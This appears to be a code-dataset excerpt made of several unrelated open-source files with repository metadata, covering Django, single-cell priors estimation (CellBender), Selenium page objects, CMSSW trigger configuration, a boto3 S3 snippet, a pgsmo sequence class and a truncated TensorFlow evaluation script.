1449e09c9233293ca4022000600e95acfe938497 | f24b229ac4ee0c0a94e48c400be4b52a7a585871 | /home/apps.py | 0a6d0b19dce6f1c25e2ae31d407f6fa52c5004ec | [] | no_license | RudreshVeerkhare/GroupChat | 462c0f9c98949d418fa10cb2aaf173c8352419ba | 39ddaaee0e5d0f36d4e44ae2b16f3a6440171259 | refs/heads/master | 2021-06-19T11:29:34.372870 | 2021-03-26T14:40:55 | 2021-03-26T14:40:55 | 193,379,367 | 28 | 6 | null | 2021-03-26T14:40:56 | 2019-06-23T17:57:19 | CSS | UTF-8 | Python | false | false | 134 | py | from django.apps import AppConfig
class HomeConfig(AppConfig):
name = "home"
def ready(self):
import home.signals
| [
"[email protected]"
] | |
132158a21c498725862cc23ae626f36d7f28db28 | 0c41f2fd4c1ad9b954097b0662e556b3eb288987 | /cellbender/remove_background/data/priors.py | 3989769165ab538647ccca8e672a97fca80bd06d | [] | permissive | broadinstitute/CellBender | e884a5520fc3e0fc2f422f8cd6dcdc6c594b5094 | 4990df713f296256577c92cab3314daeeca0f3d7 | refs/heads/master | 2023-08-21T14:55:33.619290 | 2023-08-08T18:40:14 | 2023-08-08T18:40:14 | 171,951,233 | 207 | 40 | BSD-3-Clause | 2023-08-30T05:27:18 | 2019-02-21T21:53:57 | Python | UTF-8 | Python | false | false | 15,821 | py | """Functionality for estimating various priors from the data"""
import numpy as np
import torch
from scipy.stats import gaussian_kde
from cellbender.remove_background import consts
from typing import Dict, Tuple, Union
import logging
logger = logging.getLogger('cellbender')
def _threshold_otsu(umi_counts: np.ndarray, n_bins: int = 256) -> float:
"""Return threshold value based on fast implementation of Otsu's method.
From skimage, with slight modifications:
https://github.com/scikit-image/scikit-image/blob/
a4e533ea2a1947f13b88219e5f2c5931ab092413/skimage/filters/thresholding.py#L312
Args:
umi_counts: Array of UMI counts
n_bins: Number of bins used to calculate histogram
Returns:
threshold: Upper threshold value. All droplets with UMI counts greater
than this value are assumed to contain cells.
References
----------
.. [1] Wikipedia, https://en.wikipedia.org/wiki/Otsu's_Method
.. [2] https://scikit-image.org/docs/stable/auto_examples/applications/plot_thresholding.html
Notes
-----
The input image must be grayscale.
"""
# create a UMI count histogram
counts, bin_centers = _create_histogram(umi_counts=umi_counts, n_bins=n_bins)
# class probabilities for all possible thresholds
weight1 = np.cumsum(counts)
weight2 = np.cumsum(counts[::-1])[::-1]
# class means for all possible thresholds
mean1 = np.cumsum(counts * bin_centers) / weight1
mean2 = (np.cumsum((counts * bin_centers)[::-1]) / weight2[::-1])[::-1]
# Clip ends to align class 1 and class 2 variables:
# The last value of ``weight1``/``mean1`` should pair with zero values in
# ``weight2``/``mean2``, which do not exist.
variance12 = weight1[:-1] * weight2[1:] * (mean1[:-1] - mean2[1:]) ** 2
idx = np.argmax(variance12)
threshold = bin_centers[idx]
return threshold
def _create_histogram(umi_counts: np.ndarray, n_bins: int) -> Tuple[np.ndarray, np.ndarray]:
"""Return a histogram.
Args:
umi_counts: Array of UMI counts
n_bins: Number of bins used to calculate histogram
Returns:
counts: Each element is the number of droplets falling in each UMI
count bin
bin_centers: Each element is the value corresponding to the center of
each UMI count bin
"""
counts, bin_edges = np.histogram(umi_counts.reshape(-1), n_bins)
bin_centers = (bin_edges[:-1] + bin_edges[1:]) / 2
return counts.astype('float32', copy=False), bin_centers
def _peak_density_given_cutoff(umi_counts: np.ndarray,
cutoff: float,
cell_count_low_limit: float) -> Tuple[float, float]:
"""Run scipy.stats gaussian_kde on part of the UMI curve"""
# get the UMI count values we are including
noncell_counts = umi_counts[umi_counts <= cutoff]
# resample them: the magic of looking at a log log plot
n_putative_cells = (umi_counts > cell_count_low_limit).sum()
n_putative_empties = len(noncell_counts)
inds = np.logspace(np.log10(n_putative_cells),
np.log10(n_putative_cells + n_putative_empties),
num=1000,
base=10)
inds = [max(0, min(int(ind - n_putative_cells), len(noncell_counts) - 1)) for ind in inds]
noncell_counts = np.sort(noncell_counts)[::-1][inds]
# find the peak density: that is the empty count prior
# calculate range of data, rounding out to make sure we cover everything
log_noncell_counts = np.log(noncell_counts)
x = np.arange(
np.floor(log_noncell_counts.min()) - 0.01,
np.ceil(log_noncell_counts.max()) + 0.01,
0.1
)
# fit a KDE to estimate density
k = gaussian_kde(log_noncell_counts)
density = k.evaluate(x)
# the density peak is almost surely the empty droplets
log_peak_ind = np.argmax(density)
log_peak = x[log_peak_ind]
empty_count_prior = np.exp(log_peak)
# try to go about 1 stdev up from the peak
peak_density = np.max(density)
one_std_density = 0.6 * peak_density
one_std_inds = np.where(density[log_peak_ind:] < one_std_density)[0]
if len(one_std_inds) > 0:
one_std_ind = one_std_inds[0]
else:
one_std_ind = len(density[log_peak_ind:]) - 1
empty_count_upper_limit = np.exp(x[log_peak_ind:][one_std_ind])
return empty_count_prior, empty_count_upper_limit
def get_cell_count_given_expected_cells(umi_counts: np.ndarray,
expected_cells: int) -> Dict[str, float]:
"""In the case where a prior is passed in as input, use it
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
expected_cells: Input by user
Returns:
Dict with keys ['cell_counts']
"""
order = np.argsort(umi_counts)[::-1]
cell_counts = np.exp(np.mean(np.log(umi_counts[order][:expected_cells]))).item()
return {'cell_counts': cell_counts}
def get_empty_count_given_expected_cells_and_total_droplets(
umi_counts: np.ndarray,
expected_cells: int,
total_droplets: int,
) -> Dict[str, float]:
"""In the case where a prior is passed in as input, use it
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
expected_cells: Input by user, or prior estimate
total_droplets: Input by user
Returns:
Dict with keys ['empty_counts', 'empty_count_upper_limit']
"""
order = np.argsort(umi_counts)[::-1]
starting_point = max(expected_cells, total_droplets - 500)
empty_counts = np.median(umi_counts[order]
[int(starting_point):int(total_droplets)]).item()
# need to estimate here
cell_counts = np.exp(np.mean(np.log(umi_counts[order][:expected_cells]))).item()
middle = np.sqrt(cell_counts * empty_counts)
empty_count_upper_limit = min(middle, 1.5 * empty_counts)
return {'empty_counts': empty_counts,
'empty_count_upper_limit': empty_count_upper_limit}
def get_cell_count_empty_count(umi_counts: np.ndarray,
low_count_threshold: float = 15) -> Dict[str, float]:
"""Obtain priors on cell counts and empty droplet counts from a UMI curve
using heuristics, and without applying any other prior information.
Heuristics:
0. Ignore droplets with counts below low_count_threshold
1. Use Otsu's method to threshold the log UMI count data (ignoring droplets
past 1/4 of the total droplets above low_count_threshold, as we go down
the UMI curve). This is used as a lower limit on cell counts.
It seems quite robust.
2. Use the following iterative approach, until converged:
a. Establish an upper cutoff on possible empty droplets, using the
current estimate of empty counts and our cell count prior (the
estimate is 3/4 of the geometric mean of the two).
b. Use gaussian_kde from scipy.stats to create a smooth histogram of
the log UMI counts, for droplets with counts below the cutoff.
- A trick is used to resample the droplets before creating the
histogram, so that it looks more like a log-log plot
c. Identify the peak density of the histogram as the empty count
estimate.
- Convergence happens when our estimate of empty counts stops changing.
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
low_count_threshold: Ignore droplets with counts below this value
Returns:
Dict with keys ['cell_counts', 'empty_counts']
"""
logger.debug('Beginning priors.get_cell_count_empty_count()')
reverse_sorted_umi_counts = np.sort(umi_counts)[::-1]
umi_counts_for_otsu = reverse_sorted_umi_counts[:(umi_counts > low_count_threshold).sum() // 4]
log_cell_count_low_limit = _threshold_otsu(np.log(umi_counts_for_otsu))
cell_count_low_limit = np.exp(log_cell_count_low_limit)
logger.debug(f'cell_count_low_limit is {cell_count_low_limit}')
cell_count_prior = np.mean(umi_counts[umi_counts > cell_count_low_limit])
umi_counts_for_kde = reverse_sorted_umi_counts[reverse_sorted_umi_counts > low_count_threshold]
# initial conditions for the loop
# start low, but have a failsafe (especially for simulated data)
cutoff = max(0.1 * cell_count_low_limit, umi_counts_for_kde[-100])
empty_count_prior = -100
empty_count_upper_limit = None
delta = np.inf
a = 0
# iterate to convergence, at most 5 times
while delta > 10:
logger.debug(f'cutoff = {cutoff}')
# use gaussian_kde to find the peak in the histogram
new_empty_count_prior, empty_count_upper_limit = _peak_density_given_cutoff(
umi_counts=umi_counts_for_kde,
cutoff=cutoff,
cell_count_low_limit=cell_count_low_limit,
)
logger.debug(f'new_empty_count_prior = {new_empty_count_prior}')
# 3/4 of the geometric mean is our new upper cutoff
cutoff = 0.75 * np.sqrt(cell_count_prior * new_empty_count_prior)
delta = np.abs(new_empty_count_prior - empty_count_prior)
logger.debug(f'delta = {delta}')
empty_count_prior = new_empty_count_prior
a += 1
if a >= 5:
logger.debug('Heuristics for determining empty counts exceeded 5 '
'iterations without converging')
break
# do a final estimation of cell counts:
# go to the halfway point and then take the median of the droplets above
count_crossover = np.sqrt(cell_count_prior * empty_count_prior)
cell_count_prior = np.median(umi_counts[umi_counts > count_crossover])
logger.debug(f'cell_count_prior is {cell_count_prior}')
logger.debug(f'empty_count_prior is {empty_count_prior}')
logger.debug('End of priors.get_cell_count_empty_count()')
return {'cell_counts': cell_count_prior,
'empty_counts': empty_count_prior,
'empty_count_upper_limit': empty_count_upper_limit}
def get_expected_cells_and_total_droplets(umi_counts: np.ndarray,
cell_counts: float,
empty_counts: float,
empty_count_upper_limit: float,
max_empties: int = consts.MAX_EMPTIES_TO_INCLUDE) \
-> Dict[str, int]:
"""Obtain priors on cell counts and empty droplet counts from a UMI curve
using heuristics, and without applying any other prior information.
NOTE: to be run using inputs from get_cell_count_empty_count()
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
cell_counts: Prior from get_cell_count_empty_count()
empty_counts: Prior from get_cell_count_empty_count()
empty_count_upper_limit: Prior from get_cell_count_empty_count()
max_empties: Do not include more putative empty droplets than this
Returns:
Dict with keys ['expected_cells', 'total_droplets', 'transition_point']
Example:
>>> priors = get_cell_count_empty_count(umi_counts)
>>> priors.update(get_expected_cells_and_total_droplets(umi_counts, **priors))
"""
# expected cells does well when you give it a very conservative estimate
expected_cells = (umi_counts >= cell_counts).sum()
# total droplets will be between empty_count_prior and its upper limit
total_droplets_count_value = np.sqrt(empty_counts * empty_count_upper_limit)
total_droplets = (umi_counts >= total_droplets_count_value).sum()
# find the transition point
count_crossover = np.sqrt(cell_counts * empty_counts)
transition_point = (umi_counts >= count_crossover).sum()
logger.debug(f'In get_expected_cells_and_total_droplets(), found transition '
f'point at droplet {transition_point}')
# ensure out heuristics don't go too far out datasets with many cells
total_droplets = min(total_droplets, transition_point + max_empties)
return {'expected_cells': expected_cells,
'total_droplets': total_droplets,
'transition_point': transition_point}
def get_priors(umi_counts: np.ndarray,
low_count_threshold: float,
max_total_droplets: int = consts.MAX_TOTAL_DROPLETS_GUESSED) \
-> Dict[str, Union[int, float]]:
"""Get all priors using get_cell_count_empty_count() and
get_expected_cells_and_total_droplets(), employing a failsafe if
total_droplets is improbably large.
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
low_count_threshold: Ignore droplets with counts below this value
max_total_droplets: If the initial heuristics come up with a
total_droplets value greater than this, we re-run the heuristics
with higher low_count_threshold
Returns:
Dict with keys ['cell_counts', 'empty_counts',
'empty_count_upper_limit', 'surely_empty_counts',
'expected_cells', 'total_droplets', 'log_counts_crossover']
"""
logger.debug("Computing priors from the UMI curve")
priors = get_cell_count_empty_count(
umi_counts=umi_counts,
low_count_threshold=low_count_threshold,
)
priors.update(get_expected_cells_and_total_droplets(umi_counts=umi_counts, **priors))
logger.debug(f'Automatically computed priors: {priors}')
a = 0
while priors['total_droplets'] > max_total_droplets:
logger.debug(f'Heuristics for estimating priors resulted in '
f'{priors["total_droplets"]} total_droplets, which is '
f'typically too large. Recomputing with '
f'low_count_threshold = {priors["empty_count_upper_limit"]:.0f}')
priors = get_cell_count_empty_count(
umi_counts=umi_counts,
low_count_threshold=priors['empty_count_upper_limit'],
)
priors.update(get_expected_cells_and_total_droplets(umi_counts=umi_counts, **priors))
logger.debug(f'Automatically computed priors: {priors}')
a += 1
if a > 5:
break
# compute a few last things
compute_crossover_surely_empty_and_stds(umi_counts=umi_counts, priors=priors)
return priors
def compute_crossover_surely_empty_and_stds(umi_counts, priors):
"""Given cell_counts and total_droplets, compute a few more quantities
Args:
umi_counts: Array of UMI counts per droplet, in no particular order
priors: Dict of priors
Returns:
None. Modifies priors dict in place.
"""
assert 'total_droplets' in priors.keys(), \
'Need total_droplets in priors to run compute_crossover_surely_empty_and_stds()'
assert 'cell_counts' in priors.keys(), \
'Need cell_counts in priors to run compute_crossover_surely_empty_and_stds()'
# Compute a crossover point in log count space.
reverse_sorted_counts = np.sort(umi_counts)[::-1]
surely_empty_counts = reverse_sorted_counts[priors['total_droplets']]
log_counts_crossover = (np.log(surely_empty_counts) + np.log(priors['cell_counts'])) / 2
priors.update({'log_counts_crossover': log_counts_crossover,
'surely_empty_counts': surely_empty_counts})
# Compute several other priors.
log_nonzero_umi_counts = np.log(umi_counts[umi_counts > 0])
d_std = np.std(log_nonzero_umi_counts[log_nonzero_umi_counts > log_counts_crossover]).item() / 5.
d_empty_std = 0.01 # this is basically turned off in favor of epsilon
priors.update({'d_std': d_std, 'd_empty_std': d_empty_std})
| [
"[email protected]"
] | |
dafd10119274e9bc8f0ee8f596204f2095fbc05a | f823db6961fd815b10a8828188d7b2ab58a1f699 | /testchild.py | e8b0c714f9ca3ceb6f4cb88343760c6f8f210842 | [] | no_license | mariosebastian-bit/testrepo | 26f9262c52b96ac93f2fd41cee3f137353b45b84 | 22eea3f0b58e5e9ceb44d1d0729ab3ae39ef9d1e | refs/heads/main | 2023-03-03T15:29:43.840495 | 2021-02-08T09:21:27 | 2021-02-08T09:21:27 | 336,845,049 | 0 | 0 | null | 2021-02-08T09:21:28 | 2021-02-07T17:22:07 | null | UTF-8 | Python | false | false | 44 | py | ## TESTCHILD
print ("inside the testchild")
| [
"[email protected]"
] | |
84fbbae6519e6ef37d423e06fad72516f396cfc5 | 38902540746c70149ffdfe8e8dc11be0afa14e27 | /Homework2/code/ui/pages/segments_page.py | 66541a94e77ca1c249dfb03929ec816a1c5a928f | [] | no_license | bubenchikus/2021-1-MAILRU-SDET-Python-V-Tarasenko | a214835bf20c2b28a86450e3809d24350703d48d | 9053f430010fcdc221b815028ad79c8a743117db | refs/heads/main | 2023-05-12T06:54:09.209535 | 2021-06-01T00:25:52 | 2021-06-01T00:25:52 | 351,537,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from ui.pages.base_page import BasePage
from ui.locators.page_locators import SegmentsPageLocators
class SegmentsPage(BasePage):
locators = SegmentsPageLocators()
def go_to_create_new_segment(self):
self.driver.get('https://target.my.com/segments/segments_list/new/')
def create_segment(self, segment_name):
self.go_to_create_new_segment()
self.click(self.locators.SEGMENTS_CREATE_APPS_LOCATOR)
self.click(self.locators.SEGMENTS_CREATE_GAMERS_LOCATOR)
self.click(self.locators.SEGMENTS_CREATE_GAMERS_CHOOSE_LOCATOR)
self.click(self.locators.SEGMENTS_CREATE_ADD_LOCATOR)
self.fill_field(self.locators.SEGMENTS_CREATE_NAME_LOCATOR, segment_name)
self.click(self.locators.SEGMENTS_CREATE_SUBMIT_LOCATOR)
self.find(self.locators.SEGMENTS_SEARCH_LOCATOR) # wait segments list page content to load
def delete_segments(self):
self.find(self.locators.SEGMENTS_TABLE_FRAGMENT_LOCATOR)
self.click(self.locators.SEGMENTS_CHOOSE_ALL_LOCATOR)
self.click(self.locators.SEGMENTS_ACTION_LOCATOR)
self.click(self.locators.SEGMENTS_DELETE_LOCATOR)
| [
"[email protected]"
] | |
08842649a48eb36c8cf0554d9be65a5eb137f4a6 | 006ff11fd8cfd5406c6f4318f1bafa1542095f2a | /CondTools/L1Trigger/test/L1ConfigWriteRSOnline_cfg.py | 64fa0d8ce4623c21378f8483b5e825899465cb4e | [] | permissive | amkalsi/cmssw | 8ac5f481c7d7263741b5015381473811c59ac3b1 | ad0f69098dfbe449ca0570fbcf6fcebd6acc1154 | refs/heads/CMSSW_7_4_X | 2021-01-19T16:18:22.857382 | 2016-08-09T16:40:50 | 2016-08-09T16:40:50 | 262,608,661 | 0 | 0 | Apache-2.0 | 2020-05-09T16:10:07 | 2020-05-09T16:10:07 | null | UTF-8 | Python | false | false | 8,202 | py | # This script doesn't work yet. PoolDBESSource does not see the IOV updates made earlier in the
# same event.
import FWCore.ParameterSet.Config as cms
process = cms.Process("L1ConfigWriteRSOnline")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cout.placeholder = cms.untracked.bool(False)
process.MessageLogger.cout.threshold = cms.untracked.string('DEBUG')
process.MessageLogger.debugModules = cms.untracked.vstring('*')
import FWCore.ParameterSet.VarParsing as VarParsing
options = VarParsing.VarParsing()
options.register('runNumber',
0, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"Run number")
options.register('outputDBConnect',
'sqlite_file:l1config.db', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Connection string for output DB")
options.register('outputDBAuth',
'.', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Authentication path for outputDB")
options.register('keysFromDB',
1, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"1 = read keys from OMDS, 0 = read keys from command line")
options.register('overwriteKeys',
0, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"Overwrite existing keys")
options.register('logTransactions',
1, #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.int,
"Record transactions in log DB")
# arguments for setting object keys by hand
options.register('L1MuDTTFMasksRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1MuGMTChannelMaskRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1RCTChannelMaskRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GctChannelMaskRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtPrescaleFactorsAlgoTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtPrescaleFactorsTechTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtTriggerMaskAlgoTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtTriggerMaskTechTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.register('L1GtTriggerMaskVetoTechTrigRcdKey',
'', #default value
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"Object key")
options.parseArguments()
# Define CondDB tags
from CondTools.L1Trigger.L1CondEnum_cfi import L1CondEnum
from CondTools.L1Trigger.L1O2OTags_cfi import initL1O2OTags
initL1O2OTags()
if options.keysFromDB == 1:
process.load("CondTools.L1Trigger.L1ConfigRSKeys_cff")
else:
process.load("CondTools.L1Trigger.L1TriggerKeyDummy_cff")
from CondTools.L1Trigger.L1RSSubsystemParams_cfi import initL1RSSubsystems
initL1RSSubsystems( tagBaseVec = initL1O2OTags.tagBaseVec,
L1MuDTTFMasksRcdKey = options.L1MuDTTFMasksRcdKey,
L1MuGMTChannelMaskRcdKey = options.L1MuGMTChannelMaskRcdKey,
L1RCTChannelMaskRcdKey = options.L1RCTChannelMaskRcdKey,
L1GctChannelMaskRcdKey = options.L1GctChannelMaskRcdKey,
L1GtPrescaleFactorsAlgoTrigRcdKey = options.L1GtPrescaleFactorsAlgoTrigRcdKey,
L1GtPrescaleFactorsTechTrigRcdKey = options.L1GtPrescaleFactorsTechTrigRcdKey,
L1GtTriggerMaskAlgoTrigRcdKey = options.L1GtTriggerMaskAlgoTrigRcdKey,
L1GtTriggerMaskTechTrigRcdKey = options.L1GtTriggerMaskTechTrigRcdKey,
L1GtTriggerMaskVetoTechTrigRcdKey = options.L1GtTriggerMaskVetoTechTrigRcdKey,
includeL1RCTNoisyChannelMask = False )
process.L1TriggerKeyDummy.objectKeys = initL1RSSubsystems.params.recordInfo
# Get L1TriggerKeyList from DB
process.load("CondCore.DBCommon.CondDBCommon_cfi")
process.outputDB = cms.ESSource("PoolDBESSource",
process.CondDBCommon,
toGet = cms.VPSet(cms.PSet(
record = cms.string('L1TriggerKeyListRcd'),
tag = cms.string('L1TriggerKeyList_' + initL1O2OTags.tagBaseVec[ L1CondEnum.L1TriggerKeyList ] )
)),
RefreshEachRun=cms.untracked.bool(True)
)
process.outputDB.connect = options.outputDBConnect
process.outputDB.DBParameters.authenticationPath = options.outputDBAuth
# Generate configuration data
process.load("CondTools.L1Trigger.L1ConfigRSPayloads_cff")
# writer modules
from CondTools.L1Trigger.L1CondDBPayloadWriter_cff import initPayloadWriter
initPayloadWriter( process,
outputDBConnect = options.outputDBConnect,
outputDBAuth = options.outputDBAuth,
tagBaseVec = initL1O2OTags.tagBaseVec )
process.L1CondDBPayloadWriter.writeL1TriggerKey = cms.bool(False)
if options.logTransactions == 1:
# initPayloadWriter.outputDB.logconnect = cms.untracked.string('oracle://cms_orcon_prod/CMS_COND_31X_POPCONLOG')
initPayloadWriter.outputDB.logconnect = cms.untracked.string('sqlite_file:l1o2o-log.db')
process.L1CondDBPayloadWriter.logTransactions = True
if options.overwriteKeys == 0:
process.L1CondDBPayloadWriter.overwriteKeys = False
else:
process.L1CondDBPayloadWriter.overwriteKeys = True
from CondTools.L1Trigger.L1CondDBIOVWriter_cff import initIOVWriter
initIOVWriter( process,
outputDBConnect = options.outputDBConnect,
outputDBAuth = options.outputDBAuth,
tagBaseVec = initL1O2OTags.tagBaseVec,
tscKey = '' )
process.L1CondDBIOVWriter.logKeys = True
if options.logTransactions == 1:
# initIOVWriter.outputDB.logconnect = cms.untracked.string('oracle://cms_orcon_prod/CMS_COND_31X_POPCONLOG')
initIOVWriter.outputDB.logconnect = cms.untracked.string('sqlite_file:l1o2o-log.db')
process.L1CondDBIOVWriter.logTransactions = True
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptyIOVSource",
timetype = cms.string('runnumber'),
firstValue = cms.uint64(options.runNumber),
lastValue = cms.uint64(options.runNumber),
interval = cms.uint64(1)
)
# CORAL debugging
#process.outputDB.DBParameters.messageLevel = cms.untracked.int32(3)
process.p = cms.Path(process.L1CondDBPayloadWriter*process.L1CondDBIOVWriter)
| [
"[email protected]"
] | |
44097da54a0bb03ac14196712111a1489a956689 | 172d8623d20d374bee782c3eb08a5e2b5382f412 | /python/s3_boto3.py | 22a5c98b6f60bb3b7dd4c85ed335cfc1011560b7 | [] | no_license | Abhishek24094/dev | 8124702e3e7da04eb626bd88cbfcc1a0645a8cae | 17d6bbc1bc371e60a69f646340e2d851a8a94899 | refs/heads/master | 2021-06-30T15:56:35.505092 | 2020-09-25T08:10:52 | 2020-09-25T08:10:52 | 162,133,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #proper clarification for requirement is required
import boto3
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME, CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name, Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
| [
"[email protected]"
] | |
6e5bfeee02160589220079caf6d6e3e3b76ab585 | 629090051b975b5814b4b48e2cb2c784fa6705e4 | /pgsmo/objects/sequence/sequence.py | 58b4198fa17dee038f943fed6dd518f8db8054e6 | [
"MIT"
] | permissive | microsoft/pgtoolsservice | 3d3597821c7cae1d216436d4f8143929e2c8a82a | 24a048226f7f30c775bbcbab462d499a465be5da | refs/heads/master | 2023-08-28T12:55:47.817628 | 2023-08-25T22:47:53 | 2023-08-25T22:47:53 | 80,681,087 | 68 | 35 | NOASSERTION | 2023-09-13T21:46:55 | 2017-02-02T01:00:33 | Python | UTF-8 | Python | false | false | 6,637 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from typing import Optional, List, Dict
from smo.common.node_object import NodeObject, NodeLazyPropertyCollection, NodeCollection
from smo.common.scripting_mixins import ScriptableCreate, ScriptableDelete, ScriptableUpdate
from pgsmo.objects.server import server as s # noqa
import smo.utils.templating as templating
class Sequence(NodeObject, ScriptableCreate, ScriptableDelete, ScriptableUpdate):
TEMPLATE_ROOT = templating.get_template_root(__file__, 'templates')
MACRO_ROOT = templating.get_template_root(__file__, 'macros')
GLOBAL_MACRO_ROOT = templating.get_template_root(__file__, '../global_macros')
@classmethod
def _from_node_query(cls, server: 's.Server', parent: NodeObject, **kwargs) -> 'Sequence':
"""
Creates a Sequence object from the result of a sequence node query
:param server: Server that owns the sequence
:param parent: Parent object of the sequence
:param kwargs: Row from a sequence node query
Kwargs:
oid int: Object ID of the sequence
name str: Name of the sequence
:return: A Sequence instance
"""
seq = cls(server, parent, kwargs['name'])
seq._oid = kwargs['oid']
seq._schema = kwargs['schema']
seq._scid = kwargs['schemaoid']
seq._is_system = kwargs['is_system']
return seq
def __init__(self, server: 's.Server', parent: NodeObject, name: str):
self._server = server
self._parent: Optional['NodeObject'] = parent
self._name: str = name
self._oid: Optional[int] = None
self._is_system: bool = False
self._child_collections: Dict[str, NodeCollection] = {}
self._property_collections: List[NodeLazyPropertyCollection] = []
# Use _column_property_generator instead of _property_generator
self._full_properties: NodeLazyPropertyCollection = self._register_property_collection(self._sequence_property_generator)
ScriptableCreate.__init__(self, self._template_root(server), self._macro_root(), server.version)
ScriptableDelete.__init__(self, self._template_root(server), self._macro_root(), server.version)
ScriptableUpdate.__init__(self, self._template_root(server), self._macro_root(), server.version)
self._schema: str = None
self._scid: int = None
self._def: dict = None
def _sequence_property_generator(self):
template_root = self._template_root(self._server)
# Setup the parameters for the query
template_vars = self.template_vars
# Render and execute the template
sql = templating.render_template(
templating.get_template_path(template_root, 'properties.sql', self._server.version),
self._macro_root(),
**template_vars
)
cols, rows = self._server.connection.execute_dict(sql)
if len(rows) > 0:
return rows[0]
# PROPERTIES ###########################################################
@property
def schema(self):
return self._schema
@property
def scid(self):
return self._scid
# -FULL OBJECT PROPERTIES ##############################################
@property
def cycled(self):
return self._full_properties.get("cycled", "")
@property
def increment(self):
return self._full_properties.get("increment", "")
@property
def start(self):
return self._full_properties.get("start", "")
@property
def current_value(self):
return self._full_properties.get("current_value", "")
@property
def minimum(self):
return self._full_properties.get("minimum", "")
@property
def maximum(self):
return self._full_properties.get("maximum", "")
@property
def cache(self):
return self._full_properties.get("cache", "")
@property
def cascade(self):
return self._full_properties.get("cascade", "")
@property
def seqowner(self):
return self._full_properties.get("seqowner", "")
@property
def comment(self):
return self._full_properties.get("comment", "")
# IMPLEMENTATION DETAILS ###############################################
@classmethod
def _macro_root(cls) -> List[str]:
return [cls.MACRO_ROOT, cls.GLOBAL_MACRO_ROOT]
@classmethod
def _template_root(cls, server: 's.Server') -> str:
return cls.TEMPLATE_ROOT
# HELPER METHODS ##################################################################
def _create_query_data(self):
""" Gives the data object for create query """
return {"data": {
"schema": self.schema,
"name": self.name,
"cycled": self.cycled,
"increment": self.increment,
"start": self.start,
"current_value": self.current_value,
"minimum": self.minimum,
"maximum": self.maximum,
"cache": self.cache
}}
def _update_query_data(self):
""" Gives the data object for update query """
return {
"data": {
"schema": self.schema,
"name": self.name,
"cycled": self.cycled,
"increment": self.increment,
"start": self.start,
"current_value": self.current_value,
"minimum": self.minimum,
"maximum": self.maximum,
"cache": self.cache
},
"o_data": {
"schema": self.schema,
"name": self.name,
"seqowner": self.seqowner,
"comment": self.comment
}
}
def _delete_query_data(self):
""" Gives the data object for update query """
return {
"data": {
"schema": self.schema,
"name": self.name,
"cycled": self.cycled,
"increment": self.increment,
"start": self.start,
"current_value": self.current_value,
"minimum": self.minimum,
"maximum": self.maximum,
"cache": self.cache
},
"cascade": self.cascade
}
| [
"[email protected]"
] | |
826d4da8cc659583c4853fb4e2bd9de5bafa1d8d | 3d12ddf42d8bf8503792506ff52e7f2e45ecbc76 | /prep/evaluate.py | cdfe6218d7ec5552c36ac475e40ec33cf01889f6 | [] | no_license | Jinhojeong/Thermal_Display | 5f4849410864dc2ddfa43e7d76ae8b51dd31abf8 | 16f64f373899db381b68c95e274363b9c1aec5fd | refs/heads/main | 2023-06-13T03:15:44.526154 | 2021-07-08T01:29:04 | 2021-07-08T01:29:04 | 371,365,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,239 | py | import tensorflow as tf
import numpy as np
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
import datetime
import os
from tqdm import tqdm
from config import config
#'LSTM40_2hidden_tanhtanh_6432_201109'
date = 201130
model_name = '10_2LSTM4020_4hidden_tanhs_641286432_sgfon_201116'
model = tf.keras.models.load_model(
'./models/' + model_name
)
benchmark_name = 'rawdata_Al_400_2.npy'
benchmark_data = np.load(config.npy_dest_dir+benchmark_name)
if config.eval_windowing:
init_data = benchmark_data[0,1:].reshape(1,1,config.num_features)
benchmark_traj = np.repeat(init_data, config.n_steps, axis=1)
extp_size = 1
outputs_ = benchmark_data[0,1:3].reshape(-1,2)
else:
benchmark_traj = benchmark_data[:config.n_steps,1:].reshape(1,config.n_steps,config.num_features)
extp_size = config.n_steps
outputs_ = benchmark_data[:config.n_steps,1:3].reshape(-1,2)
